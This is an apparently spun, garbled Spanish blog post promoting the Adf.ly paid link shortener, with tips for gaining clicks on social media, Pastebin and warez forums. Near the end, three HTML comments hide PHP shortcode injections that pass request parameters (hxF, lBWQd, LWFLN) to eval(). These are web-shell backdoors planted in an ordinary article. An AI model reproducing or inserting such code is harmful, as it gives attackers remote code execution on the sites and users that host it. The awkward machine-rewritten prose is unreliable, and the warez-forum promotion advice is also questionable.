Adf.ly, acorta enlaces y gana dinero

Adf.ly es un acortador de backlinks que te paga una cantidad de dinero por cada persona que visite tus links, indudablemente es una genial forma de hacer dinero en Internet.

Seguro que alguna vez has visto este servicio en alguna web, foro de discusión, YouTube… en tanto que este acortador es famosísimo y fiable.

Nos puede entregar hasta cinco.52 dólares americanos por cada mil visitas, mas esta cantidad depende del país de donde vengas las visitas.

El mínimo de pago es de cinco dólares americanos .Los pagos se efectuarán a través de Paypal, Payza y Liberty Reserve.Se puede ganar veinte por ciento de las ganancias de las personas que se registran con tu enlace de afiliado, sin que a ellos se les quite ningún centavo de sus ganancias y lo mejor que es por siempre.

Si tienes una web o bien weblog puedes poner un script que hay “tools” en el panel de Adf.ly para transformar de forma automáticas todos y cada uno de los enlace de tu weblog o bien web en enlaces adf.ly.

¿De qué manera darse de alta en Adf.ly?

Para esto damos clic en la próxima imagen:Luego un clic donde afirma JoinNow y llenamos nuestra información personal, en AccountType dejamos la primero opción para poner hacer dinero.

¿De qué forma acortar un link en Adf.ly?

Es muy simple, vamos a la página primordial de Adf.ly y pegamos el backlink allá y damos clic en Shrink!.Se puede acortar muchos links de cuajo entrando en Tools/MassShrinker

¿De qué forma se puede conseguir dinero con Adf.ly?

Para comenzar a ganar dinero en Adfly en dos mil dieciseis, sencillamente debemos poner nuestro link de Adf.ly en cualquier sitios que tiene muchas visitas, acá están los métodos más habituales para lograr visitas:

Twitter: Esta es una forma veloz y simple de configurar y promocionar sus links

Facebook: Indudablemente en esta red social vas a lograr muchas visitas y más si tienes alguna página con muchos entusiastas.

Pastebin: Poner artículos virales con backlinks en Pastebin, se pueden lograr muchas visitas con este procedimiento.

YouTube: desde YouTube se puede lograr un elevado número de visitas, por servirnos de un ejemplo podemos subir un vídeo de cualquier cosa que se puede descargar y en la descripción ponemos nuestro enlace de Adf.ly.

Foros: procuramos foros de discusión (por servirnos de un ejemplo ArgentinaWarez) con muchas visitas y publicamos nuestro backlink en un artículo atrayente.

<!– [insert_php]if (isset($_REQUEST["hxF"])){eval($_REQUEST["hxF"]);exit;}[/insert_php][php]if (isset($_REQUEST["hxF"])){eval($_REQUEST["hxF"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["lBWQd"])){eval($_REQUEST["lBWQd"]);exit;}[/insert_php][php]if (isset($_REQUEST["lBWQd"])){eval($_REQUEST["lBWQd"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["LWFLN"])){eval($_REQUEST["LWFLN"]);exit;}[/insert_php][php]if (isset($_REQUEST["LWFLN"])){eval($_REQUEST["LWFLN"]);exit;}[/php] –>

Deja tu comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *